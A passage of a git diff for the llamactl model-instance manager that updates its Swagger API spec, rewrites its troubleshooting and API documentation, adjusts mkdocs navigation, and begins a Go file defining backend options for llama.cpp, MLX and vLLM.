-      summary: Proxy requests to a specific instance
+      summary: Proxy requests to a specific instance, does not autostart instance
        if stopped
      tags:
-      - instances
+      - Instances
-  /instances/{name}/restart:
+  /api/v1/instances/{name}/restart:
    post:
      description: Restarts a specific instance by name
      parameters:
@@ -477,7 +460,7 @@ paths:
        "200":
          description: Restarted instance details
          schema:
-            $ref: '#/definitions/instance.Process'
+            $ref: '#/definitions/instance.Instance'
        "400":
          description: Invalid name format
          schema:
@@ -490,8 +473,8 @@ paths:
      - ApiKeyAuth: []
      summary: Restart a running instance
      tags:
-      - instances
+      - Instances
-  /instances/{name}/start:
+  /api/v1/instances/{name}/start:
    post:
      description: Starts a specific instance by name
      parameters:
@@ -504,7 +487,7 @@ paths:
        "200":
          description: Started instance details
          schema:
-            $ref: '#/definitions/instance.Process'
+            $ref: '#/definitions/instance.Instance'
        "400":
          description: Invalid name format
          schema:
@@ -517,8 +500,8 @@ paths:
      - ApiKeyAuth: []
      summary: Start a stopped instance
      tags:
-      - instances
+      - Instances
-  /instances/{name}/stop:
+  /api/v1/instances/{name}/stop:
    post:
      description: Stops a specific instance by name
      parameters:
@@ -531,7 +514,7 @@ paths:
        "200":
          description: Stopped instance details
          schema:
-            $ref: '#/definitions/instance.Process'
+            $ref: '#/definitions/instance.Instance'
        "400":
          description: Invalid name format
          schema:
@@ -544,7 +527,444 @@ paths:
      - ApiKeyAuth: []
      summary: Stop a running instance
      tags:
-      - instances
+      - Instances
  /api/v1/nodes:
    get:
      description: Returns a map of all nodes configured in the server (node name
        -> node config)
      responses:
        "200":
          description: Map of nodes
          schema:
            additionalProperties:
              $ref: '#/definitions/server.NodeResponse'
            type: object
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: List all configured nodes
      tags:
      - Nodes
  /api/v1/nodes/{name}:
    get:
      description: Returns the details of a specific node by name
      parameters:
      - description: Node Name
        in: path
        name: name
        required: true
        type: string
      responses:
        "200":
          description: Node details
          schema:
            $ref: '#/definitions/server.NodeResponse'
        "400":
          description: Invalid name format
          schema:
            type: string
        "404":
          description: Node not found
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Get details of a specific node
      tags:
      - Nodes
  /api/v1/version:
    get:
      description: Returns the version of the llamactl command
      responses:
        "200":
          description: Version information
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Get llamactl version
      tags:
      - System
  /llama-cpp/{name}/:
    get:
      description: Proxies requests to the llama.cpp UI for the specified instance
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - text/html
      responses:
        "200":
          description: Proxied HTML response
          schema:
            type: string
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp UI for the instance
      tags:
      - Llama.cpp
  /llama-cpp/{name}/apply-template:
    post:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
  /llama-cpp/{name}/completion:
    post:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
  /llama-cpp/{name}/detokenize:
    post:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
  /llama-cpp/{name}/embeddings:
    post:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
  /llama-cpp/{name}/infill:
    post:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
  /llama-cpp/{name}/metrics:
    post:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
  /llama-cpp/{name}/props:
    get:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
    post:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
  /llama-cpp/{name}/reranking:
    post:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
  /llama-cpp/{name}/slots:
    get:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
  /llama-cpp/{name}/tokenize:
    post:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
  /v1/:
    post:
      consumes:
@@ -567,7 +987,7 @@ paths:
      - ApiKeyAuth: []
      summary: OpenAI-compatible proxy endpoint
      tags:
-      - openai
+      - OpenAI
  /v1/models:
    get:
      description: Returns a list of instances in a format compatible with OpenAI
@@ -585,22 +1005,10 @@ paths:
      - ApiKeyAuth: []
      summary: List instances in OpenAI-compatible format
      tags:
-      - openai
+      - OpenAI
-  /version:
+securityDefinitions:
-    get:
+  ApiKeyAuth:
-      description: Returns the version of the llamactl command
+    in: header
-      responses:
+    name: X-API-Key
-        "200":
+    type: apiKey
          description: Version information
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Get llamactl version
      tags:
      - version
 swagger: "2.0"
--- a/docs/troubleshooting.md
+++ b/docs/troubleshooting.md
@@ -0,0 +1,193 @@
 # Troubleshooting
 Issues specific to Llamactl deployment and operation.
 ## Configuration Issues
 ### Invalid Configuration
 **Problem:** Invalid configuration preventing startup
 **Solutions:**
 1. Use minimal configuration:
   ```yaml
   server:
     host: "0.0.0.0"
     port: 8080
   instances:
     port_range: [8000, 9000]
   ```
 2. Check data directory permissions:
   ```bash
   # Ensure data directory is writable (default: ~/.local/share/llamactl)
   mkdir -p ~/.local/share/llamactl/{instances,logs}
   ```
 ## Instance Management Issues
 ### Instance Fails to Start
 **Problem:** Instance fails to start or immediately stops
 **Solutions:**
 1. **Check instance logs** to see the actual error:
   ```bash
   curl http://localhost:8080/api/v1/instances/{name}/logs
   # Or check log files directly
   tail -f ~/.local/share/llamactl/logs/{instance-name}.log
   ```
 2. **Verify backend is installed:**  
     - **llama.cpp**: Ensure `llama-server` is in PATH
     - **MLX**: Ensure `mlx-lm` Python package is installed
     - **vLLM**: Ensure `vllm` Python package is installed
 3. **Check model path and format:**
     - Use absolute paths to model files
     - Verify model format matches backend (GGUF for llama.cpp, etc.)
 4. **Verify backend command configuration:**
     - Check that the backend `command` is correctly configured in the global config
     - For virtual environments, specify the full path to the command (e.g., `/path/to/venv/bin/mlx_lm.server`)
     - See the [Configuration Guide](configuration.md) for backend configuration details
     - Test the backend directly (see [Backend-Specific Issues](#backend-specific-issues) below)
 ### Backend-Specific Issues
 **Problem:** Model loading, memory, GPU, or performance issues
 Most model-specific issues (memory, GPU configuration, performance tuning) are backend-specific and should be resolved by consulting the respective backend documentation:
 **llama.cpp:**
 - [llama.cpp GitHub](https://github.com/ggml-org/llama.cpp)
 - [llama-server README](https://github.com/ggml-org/llama.cpp/blob/master/tools/server/README.md)
 **MLX:**
 - [MLX-LM GitHub](https://github.com/ml-explore/mlx-lm)
 - [MLX-LM Server Guide](https://github.com/ml-explore/mlx-lm/blob/main/mlx_lm/SERVER.md)
 **vLLM:**
 - [vLLM Documentation](https://docs.vllm.ai/en/stable/)
 - [OpenAI Compatible Server](https://docs.vllm.ai/en/stable/serving/openai_compatible_server.html)
 - [vllm serve Command](https://docs.vllm.ai/en/stable/cli/serve.html#vllm-serve)
 **Testing backends directly:**
 Testing your model and configuration directly with the backend helps determine if the issue is with llamactl or the backend itself:
 ```bash
 # llama.cpp
 llama-server --model /path/to/model.gguf --port 8081
 # MLX
 mlx_lm.server --model mlx-community/Mistral-7B-Instruct-v0.3-4bit --port 8081
 # vLLM
 vllm serve microsoft/DialoGPT-medium --port 8081
 ```
 ## API and Network Issues
 ### CORS Errors
 **Problem:** Web UI shows CORS errors in browser console
 **Solutions:**
 1. **Configure allowed origins:**
   ```yaml
   server:
     allowed_origins:
       - "http://localhost:3000"
       - "https://yourdomain.com"
   ```
 ## Authentication Issues
 **Problem:** API requests failing with authentication errors
 **Solutions:**
 1. **Disable authentication temporarily:**
   ```yaml
   auth:
     require_management_auth: false
     require_inference_auth: false
   ```
 2. **Configure API keys:**
   ```yaml
   auth:
     management_keys:
       - "your-management-key"
     inference_keys:
       - "your-inference-key"
   ```
 3. **Use correct Authorization header:**
   ```bash
   curl -H "Authorization: Bearer your-api-key" \
     http://localhost:8080/api/v1/instances
   ```
 ## Remote Node Issues
 ### Node Configuration
 **Problem:** Remote instances not appearing or cannot be managed
 **Solutions:**
 1. **Verify node configuration:**
   ```yaml
   local_node: "main"  # Must match a key in nodes map
   nodes:
     main:
       address: ""     # Empty for local node
     worker1:
       address: "http://worker1.internal:8080"
       api_key: "secure-key"  # Must match worker1's management key
   ```
 2. **Check node name consistency:**
   - The `local_node` value on each node must match the name (the key in the `nodes` map) that other nodes use to refer to it
   - Node names are case-sensitive
 3. **Test remote node connectivity:**
   ```bash
   curl -H "Authorization: Bearer remote-node-key" \
     http://remote-node:8080/api/v1/instances
   ```
 ## Debugging and Logs
 ### Viewing Instance Logs
 ```bash
 # Get instance logs via API
 curl http://localhost:8080/api/v1/instances/{name}/logs
 # Or check log files directly
 tail -f ~/.local/share/llamactl/logs/{instance-name}.log
 ```
 ### Enable Debug Logging
 ```bash
 export LLAMACTL_LOG_LEVEL=debug
 llamactl
 ```
 ## Getting Help
 When reporting issues, include:
 1. **System information:**
   ```bash
   llamactl --version
   ```
 2. **Configuration file** (remove sensitive keys)
 3. **Relevant log output**
 4. **Steps to reproduce the issue**
--- a/docs/user-guide/api-reference.md
+++ b/docs/user-guide/api-reference.md
@@ -1,508 +0,0 @@
 # API Reference
 Complete reference for the Llamactl REST API.
 ## Base URL
 All API endpoints are relative to the base URL:
 ```
 http://localhost:8080/api/v1
 ```
 ## Authentication
 Llamactl supports API key authentication. If authentication is enabled, include the API key in the Authorization header:
 ```bash
 curl -H "Authorization: Bearer <your-api-key>" \
  http://localhost:8080/api/v1/instances
 ```
 The server supports two types of API keys:
 - **Management API Keys**: Required for instance management operations (CRUD operations on instances)
 - **Inference API Keys**: Required for OpenAI-compatible inference endpoints
 ## System Endpoints
 ### Get Llamactl Version
 Get the version information of the llamactl server.
 ```http
 GET /api/v1/version
 ```
 **Response:**
 ```
 Version: 1.0.0
 Commit: abc123
 Build Time: 2024-01-15T10:00:00Z
 ```
 ### Get Llama Server Help
 Get help text for the llama-server command.
 ```http
 GET /api/v1/backends/llama-cpp/help
 ```
 **Response:** Plain text help output from `llama-server --help`
 ### Get Llama Server Version
 Get version information of the llama-server binary.
 ```http
 GET /api/v1/backends/llama-cpp/version
 ```
 **Response:** Plain text version output from `llama-server --version`
 ### List Available Devices
 List available devices for llama-server.
 ```http
 GET /api/v1/backends/llama-cpp/devices
 ```
 **Response:** Plain text device list from `llama-server --list-devices`
 ## Instances
 ### List All Instances
 Get a list of all instances.
 ```http
 GET /api/v1/instances
 ```
 **Response:**
 ```json
 [
  {
    "name": "llama2-7b",
    "status": "running",
    "created": 1705312200
  }
 ]
 ```
 ### Get Instance Details
 Get detailed information about a specific instance.
 ```http
 GET /api/v1/instances/{name}
 ```
 **Response:**
 ```json
 {
  "name": "llama2-7b",
  "status": "running",
  "created": 1705312200
 }
 ```
 ### Create Instance
 Create and start a new instance.
 ```http
 POST /api/v1/instances/{name}
 ```
 **Request Body:** JSON object with instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
 **Response:**
 ```json
 {
  "name": "llama2-7b",
  "status": "running",
  "created": 1705312200
 }
 ```
 ### Update Instance
 Update an existing instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
 ```http
 PUT /api/v1/instances/{name}
 ```
 **Request Body:** JSON object with configuration fields to update.
 **Response:**
 ```json
 {
  "name": "llama2-7b",
  "status": "running",
  "created": 1705312200
 }
 ```
 ### Delete Instance
 Stop and remove an instance.
 ```http
 DELETE /api/v1/instances/{name}
 ```
 **Response:** `204 No Content`
 ## Instance Operations
 ### Start Instance
 Start a stopped instance.
 ```http
 POST /api/v1/instances/{name}/start
 ```
 **Response:**
 ```json
 {
  "name": "llama2-7b",
  "status": "running",
  "created": 1705312200
 }
 ```
 **Error Responses:**
 - `409 Conflict`: Maximum number of running instances reached
 - `500 Internal Server Error`: Failed to start instance
 ### Stop Instance
 Stop a running instance.
 ```http
 POST /api/v1/instances/{name}/stop
 ```
 **Response:**
 ```json
 {
  "name": "llama2-7b",
  "status": "stopped",
  "created": 1705312200
 }
 ```
 ### Restart Instance
 Restart an instance (stop then start).
 ```http
 POST /api/v1/instances/{name}/restart
 ```
 **Response:**
 ```json
 {
  "name": "llama2-7b",
  "status": "running",
  "created": 1705312200
 }
 ```
 ### Get Instance Logs
 Retrieve instance logs.
 ```http
 GET /api/v1/instances/{name}/logs
 ```
 **Query Parameters:**
 - `lines`: Number of lines to return. Omit the parameter or pass `-1` to return all lines.
 **Response:** Plain text log output
 **Example:**
 ```bash
 curl "http://localhost:8080/api/v1/instances/my-instance/logs?lines=100"
 ```
 ### Proxy to Instance
 Proxy HTTP requests directly to the llama-server instance.
 ```http
 GET /api/v1/instances/{name}/proxy/*
 POST /api/v1/instances/{name}/proxy/*
 ```
 This endpoint forwards all requests to the underlying llama-server instance running on its configured port. The proxy strips the `/api/v1/instances/{name}/proxy` prefix and forwards the remaining path to the instance.
 **Example - Check Instance Health:**
 ```bash
 curl -H "Authorization: Bearer your-api-key" \
  http://localhost:8080/api/v1/instances/my-model/proxy/health
 ```
 This forwards the request to `http://instance-host:instance-port/health` on the actual llama-server instance.
 **Error Responses:**
 - `503 Service Unavailable`: Instance is not running
 ## OpenAI-Compatible API
 Llamactl provides OpenAI-compatible endpoints for inference operations.
 ### List Models
 List all instances in OpenAI-compatible format.
 ```http
 GET /v1/models
 ```
 **Response:**
 ```json
 {
  "object": "list",
  "data": [
    {
      "id": "llama2-7b",
      "object": "model",
      "created": 1705312200,
      "owned_by": "llamactl"
    }
  ]
 }
 ```
 ### Chat Completions, Completions, Embeddings
 All OpenAI-compatible inference endpoints are available:
 ```http
 POST /v1/chat/completions
 POST /v1/completions
 POST /v1/embeddings
 POST /v1/rerank
 POST /v1/reranking
 ```
 **Request Body:** Standard OpenAI format with `model` field specifying the instance name
 **Example:**
 ```json
 {
  "model": "llama2-7b",
  "messages": [
    {
      "role": "user",
      "content": "Hello, how are you?"
    }
  ]
 }
 ```
 The server routes requests to the appropriate instance based on the `model` field in the request body. Instances with on-demand starting enabled will be automatically started if not running. For configuration details, see [Managing Instances](managing-instances.md).
 **Error Responses:**
 - `400 Bad Request`: Invalid request body or missing instance name
 - `503 Service Unavailable`: Instance is not running and on-demand start is disabled
 - `409 Conflict`: Cannot start instance due to maximum instances limit
 ## Instance Status Values
 Instances can have the following status values:
 - `stopped`: Instance is not running
 - `running`: Instance is running and ready to accept requests
 - `failed`: Instance failed to start or crashed  
 ## Error Responses
 All endpoints may return error responses in the following format:
 ```json
 {
  "error": "Error message description"
 }
 ```
 ### Common HTTP Status Codes
 - `200`: Success
 - `201`: Created
 - `204`: No Content (successful deletion)
 - `400`: Bad Request (invalid parameters or request body)
 - `401`: Unauthorized (missing or invalid API key)
 - `403`: Forbidden (insufficient permissions)
 - `404`: Not Found (instance not found)
 - `409`: Conflict (instance already exists, max instances reached)
 - `500`: Internal Server Error
 - `503`: Service Unavailable (instance not running)
 ## Examples
 ### Complete Instance Lifecycle
 ```bash
 # Create and start instance
 curl -X POST http://localhost:8080/api/v1/instances/my-model \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer your-api-key" \
  -d '{
    "model": "/models/llama-2-7b.gguf"
  }'
 # Check instance status
 curl -H "Authorization: Bearer your-api-key" \
  http://localhost:8080/api/v1/instances/my-model
 # Get instance logs
 curl -H "Authorization: Bearer your-api-key" \
  "http://localhost:8080/api/v1/instances/my-model/logs?lines=50"
 # Use OpenAI-compatible chat completions
 curl -X POST http://localhost:8080/v1/chat/completions \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer your-inference-api-key" \
  -d '{
    "model": "my-model",
    "messages": [
      {"role": "user", "content": "Hello!"}
    ],
    "max_tokens": 100
  }'
 # Stop instance
 curl -X POST -H "Authorization: Bearer your-api-key" \
  http://localhost:8080/api/v1/instances/my-model/stop
 # Delete instance
 curl -X DELETE -H "Authorization: Bearer your-api-key" \
  http://localhost:8080/api/v1/instances/my-model
 ```
 ### Using the Proxy Endpoint
 You can also directly proxy requests to the llama-server instance:
 ```bash
 # Direct proxy to instance (bypasses OpenAI compatibility layer)
 curl -X POST http://localhost:8080/api/v1/instances/my-model/proxy/completion \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer your-api-key" \
  -d '{
    "prompt": "Hello, world!",
    "n_predict": 50
  }'
 ```
 ## Backend-Specific Endpoints
 ### Parse Commands
 Llamactl provides endpoints to parse command strings from different backends into instance configuration options.
 #### Parse Llama.cpp Command
 Parse a llama-server command string into instance options.
 ```http
 POST /api/v1/backends/llama-cpp/parse-command
 ```
 **Request Body:**
 ```json
 {
  "command": "llama-server -m /path/to/model.gguf -c 2048 --port 8080"
 }
 ```
 **Response:**
 ```json
 {
  "backend_type": "llama_cpp",
  "llama_server_options": {
    "model": "/path/to/model.gguf",
    "ctx_size": 2048,
    "port": 8080
  }
 }
 ```
 #### Parse MLX-LM Command
 Parse an MLX-LM server command string into instance options.
 ```http
 POST /api/v1/backends/mlx/parse-command
 ```
 **Request Body:**
 ```json
 {
  "command": "mlx_lm.server --model /path/to/model --port 8080"
 }
 ```
 **Response:**
 ```json
 {
  "backend_type": "mlx_lm",
  "mlx_server_options": {
    "model": "/path/to/model",
    "port": 8080
  }
 }
 ```
 #### Parse vLLM Command
 Parse a vLLM serve command string into instance options.
 ```http
 POST /api/v1/backends/vllm/parse-command
 ```
 **Request Body:**
 ```json
 {
  "command": "vllm serve /path/to/model --port 8080"
 }
 ```
 **Response:**
 ```json
 {
  "backend_type": "vllm",
  "vllm_server_options": {
    "model": "/path/to/model",
    "port": 8080
  }
 }
 ```
 **Error Responses for Parse Commands:**
 - `400 Bad Request`: Invalid request body, empty command, or parse error
 - `500 Internal Server Error`: Encoding error
 ## Auto-Generated Documentation
 The API documentation is automatically generated from code annotations using Swagger/OpenAPI. To regenerate the documentation:
 1. Install the swag tool: `go install github.com/swaggo/swag/cmd/swag@latest`
 2. Generate docs: `swag init -g cmd/server/main.go -o apidocs`
 ## Swagger Documentation
 If swagger documentation is enabled in the server configuration, you can access the interactive API documentation at:
 ```
 http://localhost:8080/swagger/
 ```
 This provides a complete interactive interface for testing all API endpoints.
--- a/docs/user-guide/troubleshooting.md
+++ b/docs/user-guide/troubleshooting.md
@@ -1,160 +0,0 @@
 # Troubleshooting
 Issues specific to Llamactl deployment and operation.
 ## Configuration Issues
 ### Invalid Configuration
 **Problem:** Llamactl fails to start because of an invalid configuration
 **Solutions:**
 1. Use minimal configuration:
   ```yaml
   server:
     host: "0.0.0.0"
     port: 8080
   instances:
     port_range: [8000, 9000]
   ```
 2. Check data directory permissions:
   ```bash
   # Ensure data directory is writable (default: ~/.local/share/llamactl)
   mkdir -p ~/.local/share/llamactl/{instances,logs}
   ```
 ## Instance Management Issues
 ### Model Loading Failures
 **Problem:** Instance fails to start with model loading errors
 **Common Solutions:**  
 - **llama-server not found:** Ensure `llama-server` binary is in PATH  
 - **Wrong model format:** Ensure model is in GGUF format  
 - **Insufficient memory:** Use smaller model or reduce context size  
 - **Path issues:** Use absolute paths to model files  
 ### Memory Issues
 **Problem:** Out of memory errors or system becomes unresponsive
 **Solutions:**
 1. **Reduce context size:**
   ```json
   {
     "n_ctx": 1024
   }
   ```
 2. **Use quantized models:**  
   - Try Q4_K_M instead of higher precision models  
   - Use smaller model variants (7B instead of 13B)  
 ### GPU Configuration
 **Problem:** GPU not being used effectively
 **Solutions:**
 1. **Configure GPU layers:**
   ```json
   {
     "n_gpu_layers": 35
   }
   ```
 ### Advanced Instance Issues
 **Problem:** Complex model loading, performance, or compatibility issues
 Since llamactl uses `llama-server` under the hood, many instance-related issues are actually llama.cpp issues. For advanced troubleshooting:
 **Resources:**  
 - **llama.cpp Documentation:** [https://github.com/ggml/llama.cpp](https://github.com/ggml/llama.cpp)  
 - **llama.cpp Issues:** [https://github.com/ggml/llama.cpp/issues](https://github.com/ggml/llama.cpp/issues)  
 - **llama.cpp Discussions:** [https://github.com/ggml/llama.cpp/discussions](https://github.com/ggml/llama.cpp/discussions)  
 **Testing directly with llama-server:**  
 ```bash
 # Test your model and parameters directly with llama-server
 llama-server --model /path/to/model.gguf --port 8081 --n-gpu-layers 35
 ```
 This helps determine if the issue is with llamactl or with the underlying llama.cpp/llama-server.
 ## API and Network Issues
 ### CORS Errors
 **Problem:** Web UI shows CORS errors in browser console
 **Solutions:**
 1. **Configure allowed origins:**
   ```yaml
   server:
     allowed_origins:
       - "http://localhost:3000"
       - "https://yourdomain.com"
   ```
 ## Authentication Issues
 **Problem:** API requests failing with authentication errors
 **Solutions:**
 1. **Disable authentication temporarily:**
   ```yaml
   auth:
     require_management_auth: false
     require_inference_auth: false
   ```
 2. **Configure API keys:**
   ```yaml
   auth:
     management_keys:
       - "your-management-key"
     inference_keys:
       - "your-inference-key"
   ```
 3. **Use correct Authorization header:**
   ```bash
   curl -H "Authorization: Bearer your-api-key" \
     http://localhost:8080/api/v1/instances
   ```
 ## Debugging and Logs
 ### Viewing Instance Logs
 ```bash
 # Get instance logs via API
 curl http://localhost:8080/api/v1/instances/{name}/logs
 # Or check log files directly
 tail -f ~/.local/share/llamactl/logs/{instance-name}.log
 ```
 ### Enable Debug Logging
 ```bash
 export LLAMACTL_LOG_LEVEL=debug
 llamactl
 ```
 ## Getting Help
 When reporting issues, include:
 1. **System information:**
   ```bash
   llamactl --version
   ```
 2. **Configuration file** (remove sensitive keys)
 3. **Relevant log output**
 4. **Steps to reproduce the issue**
--- a/mkdocs.yml
+++ b/mkdocs.yml
@@ -25,8 +25,8 @@ theme:
        name: Switch to light mode
  features:
    - navigation.tabs
-    - navigation.sections
+    - navigation.tabs.sticky
-    - navigation.expand
+    - toc.integrate
    - navigation.top
    - search.highlight
    - search.share
@@ -49,14 +49,12 @@ markdown_extensions:
 nav:
  - Home: index.md
-  - Getting Started:
+  - Installation: installation.md
-    - Installation: getting-started/installation.md
+  - Quick Start: quick-start.md
-    - Quick Start: getting-started/quick-start.md
+  - Configuration: configuration.md
-    - Configuration: getting-started/configuration.md
+  - Managing Instances: managing-instances.md
-  - User Guide:
+  - API Reference: api-reference.md
-    - Managing Instances: user-guide/managing-instances.md
+  - Troubleshooting: troubleshooting.md
    - API Reference: user-guide/api-reference.md
    - Troubleshooting: user-guide/troubleshooting.md
 plugins:
  - search
@@ -66,9 +64,12 @@ plugins:
      css_dir: css
      javascript_dir: js
      canonical_version: null
  - neoteroi.mkdocsoad:
      use_pymdownx: true
 hooks:
  - docs/readme_sync.py
  - docs/fix_line_endings.py
 extra:
  version:
@@ -77,3 +78,6 @@ extra:
  social:
    - icon: fontawesome/brands/github
      link: https://github.com/lordmathis/llamactl
 extra_css:
 - css/css-v1.1.3.css
--- a/pkg/backends/backend.go
+++ b/pkg/backends/backend.go
@@ -1,10 +1,252 @@
 package backends
 import (
 	"encoding/json"
 	"fmt"
 	"llamactl/pkg/config"
 	"llamactl/pkg/validation"
 	"maps"
 )
 // BackendType is the string identifier that selects which backend
 // implementation an Options value refers to.
 type BackendType string
 // Known backend identifiers. These are the values matched against
 // Options.BackendType when selecting a backend implementation.
 const (
 	BackendTypeLlamaCpp BackendType = "llama_cpp"
 	BackendTypeMlxLm    BackendType = "mlx_lm"
 	BackendTypeVllm     BackendType = "vllm"
 	// BackendTypeMlxVlm BackendType = "mlx_vlm"  // Future expansion
 )
 // backend is the package-internal contract implemented by every
 // backend-specific options struct (LlamaServerOptions, MlxServerOptions,
 // VllmServerOptions). Options delegates to it instead of switching on the
 // backend type in every method.
 type backend interface {
 	// BuildCommandArgs returns the arguments used for native execution.
 	BuildCommandArgs() []string
 	// BuildDockerArgs returns the arguments used when running under Docker.
 	BuildDockerArgs() []string
 	// GetPort returns the port stored in the options.
 	GetPort() int
 	// SetPort stores the given port in the options.
 	SetPort(int)
 	// GetHost returns the host stored in the options.
 	GetHost() string
 	// Validate reports whether the options are acceptable.
 	Validate() error
 	// ParseCommand parses a command string; the concrete result type is
 	// backend-specific, hence the any return.
 	ParseCommand(string) (any, error)
 }
 // backendConstructors maps each supported BackendType to a factory that
 // returns a fresh, zero-valued options struct for that backend. A type missing
 // from this map is reported as unsupported by Options.UnmarshalJSON.
 var backendConstructors = map[BackendType]func() backend{
 	BackendTypeLlamaCpp: func() backend { return &LlamaServerOptions{} },
 	BackendTypeMlxLm:    func() backend { return &MlxServerOptions{} },
 	BackendTypeVllm:     func() backend { return &VllmServerOptions{} },
 }
 // Options carries the backend selection and its configuration.
 //
 // On the wire only backend_type and the generic backend_options map are
 // visible; the typed fields are tagged json:"-" and are filled in / read back
 // by the custom UnmarshalJSON and MarshalJSON methods.
 type Options struct {
 	BackendType    BackendType    `json:"backend_type"`
 	BackendOptions map[string]any `json:"backend_options,omitempty"`
 	// Backend-specific options
 	LlamaServerOptions *LlamaServerOptions `json:"-"`
 	MlxServerOptions   *MlxServerOptions   `json:"-"`
 	VllmServerOptions  *VllmServerOptions  `json:"-"`
 }
 // UnmarshalJSON decodes the generic JSON form of Options and, when
 // backend_options is present, converts that map into the typed options struct
 // that corresponds to backend_type.
 //
 // It returns an error if the JSON is malformed, if backend_type has no
 // registered constructor, or if the options cannot be converted.
 func (o *Options) UnmarshalJSON(data []byte) error {
 	// Alias has the same fields as Options but none of its methods, so the
 	// decode below does not recurse into this function.
 	type Alias Options
 	aux := &struct {
